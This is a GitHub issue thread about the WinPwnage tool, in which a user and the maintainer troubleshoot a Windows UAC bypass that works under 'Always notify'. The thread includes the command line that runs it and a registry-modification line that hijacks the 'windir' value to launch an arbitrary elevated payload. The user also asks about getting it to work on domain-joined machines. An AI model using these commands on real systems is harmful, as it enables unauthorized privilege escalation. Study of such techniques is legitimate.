### ISSUE TITLE
Always notify

### ISSUE THREAD

**Issue by moaeddy** [rootm0s/WinPwnage#50]
which of this UAC techniques bypass if UAC set to ALWAYS NOTIFY?

**Comment by rootm0s** [comment]
That would be `uac_silentcleanup.py` function. 

`winpwnage.py --use uac --id 4 --payload c:\\windows\\system32\\cmd.exe`

**Comment by moaeddy** [comment]
used compiled BIN with below syntax

winpwnage.exe --use uac --id 4 --payload c:\\windows\\system32\\cmd.exe

only see winpwnage process but no CMD popup

Tested on windows10 ver 1803 (x64) and windows7 7601(x86)

**Comment by rootm0s** [comment]
> used compiled BIN with below syntax
> 
> winpwnage.exe --use uac --id 4 --payload c:\windows\system32\cmd.exe
> 
> only see winpwnage process but no CMD popup
> 
> Tested on windows10 ver 1803 (x64) and windows7 7601(x86)

Alright, works for me here. Tested on:
```
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.17763 N/A Build 17763
```

Did you build using py2exe or pyinstaller?

**Comment by moaeddy** [comment]
pyinstaller 

Python version 2.7

**Comment by moaeddy** [comment]
if i use py2exe to build a BIN, i got this output when running BIN with syntax

Traceback (most recent call last):
  File "winpwnage.py", line 2, in <module>
  File "zipextimporter.pyo", line 82, in load_module
  File "winpwnage\core\prints.pyo", line 2, in <module>
ImportError: No module named colorama


and if i run pip install -r requirements.txt 

got this

Exception:
Traceback (most recent call last):
  File "C:\Python34\lib\site-packages\pip\basecommand.py", line 122, in main
    status = self.run(options, args)
  File "C:\Python34\lib\site-packages\pip\commands\install.py", line 262, in run
    for req in parse_requirements(filename, finder=finder, options=options, session=session):
  File "C:\Python34\lib\site-packages\pip\req.py", line 1631, in parse_requirements
    req = InstallRequirement.from_line(line, comes_from, prereleases=getattr(options, "pre", None))
  File "C:\Python34\lib\site-packages\pip\req.py", line 172, in from_line
    return cls(req, comes_from, url=url, prereleases=prereleases)
  File "C:\Python34\lib\site-packages\pip\req.py", line 70, in __init__
    req = pkg_resources.Requirement.parse(req)
  File "C:\Python34\lib\site-packages\pip\_vendor\pkg_resources.py", line 2667, in parse
    reqs = list(parse_requirements(s))
  File "C:\Python34\lib\site-packages\pip\_vendor\pkg_resources.py", line 2605, in parse_requirements
    line, p, specs = scan_list(VERSION,LINE_END,line,p,(1,2),"version spec")
  File "C:\Python34\lib\site-packages\pip\_vendor\pkg_resources.py", line 2573, in scan_list
    raise ValueError("Expected "+item_name+" in",line,"at",line[p:])
ValueError: ('Expected version spec in', "enum34; python_version < '3.4'", 'at', "; python_version < '3.4'")

**Comment by rootm0s** [comment]
There's nothing wrong with winpwnage package, it seems like it's your enviroment that is broken. For example, if you have installed all the dependencies correctly then you shouldn't get this error `ImportError: No module named colorama`

You can't build unless you have all the modules it requires.

Just to be sure, I ran a test-build and it works normally here!

**Comment by moaeddy** [comment]
ok i got colorama install by changing python environment, but got this error when running BIN

Traceback (most recent call last):
  File "winpwnage.py", line 3, in <module>
  File "zipextimporter.pyo", line 82, in load_module
  File "winpwnage\core\scanner.pyo", line 1, in <module>
  File "zipextimporter.pyo", line 82, in load_module
  File "winpwnage\functions\uac\uac_runas.pyo", line 2, in <module>
  File "zipextimporter.pyo", line 82, in load_module
  File "winpwnage\core\utils.pyo", line 10, in <module>
  File "zipextimporter.pyo", line 82, in load_module
  File "winpwnage\core\winstructures.pyo", line 32, in <module>
AttributeError: 'module' object has no attribute 'IntEnum'

**Comment by rootm0s** [comment]
@moaeddy Install the right Enum package. Use pip `pip install enum34`

**Comment by moaeddy** [comment]
ok, i need a drink, that just solve my problem. its working

**Comment by rootm0s** [comment]
Great 👍

**Comment by moaeddy** [comment]
not to worry, i modify uac_silentcleanup.py to execute my file instead CMD. maybe you need to look into this to call on any executable at a given syntax

**Comment by rootm0s** [comment]
It's working with different executables, not only CMD.

**Comment by rootm0s** [comment]
There is a bug causing this. If you replace

`registry().modify_key(hkey="hkcu", path=path, name="windir", value="cmd.exe & {payload}".format(payload=os.path.join(payload)), create=True)`

With this:
`registry().modify_key(hkey="hkcu", path=path, name="windir", value="cmd.exe /c start {payload} &&".format(payload=os.path.join(payload)), create=True)`

I will push a fix for this 👍

**Comment by moaeddy** [comment]
tested this against computer connected to a domain but didn't run as ADMIN yet just run payload as normal user. any clue how to make this work on computer connected to a DOMAIN?

but works on computer on WORKGROUP

**Comment by moaeddy** [comment]
i should understand this doesn't work on DOMAIN computer?

**Comment by rootm0s** [comment]
It's been tested on domain connected computers, and it works. I cannot guarantee it works on all computers though. Project is provided so you can study the techniques!
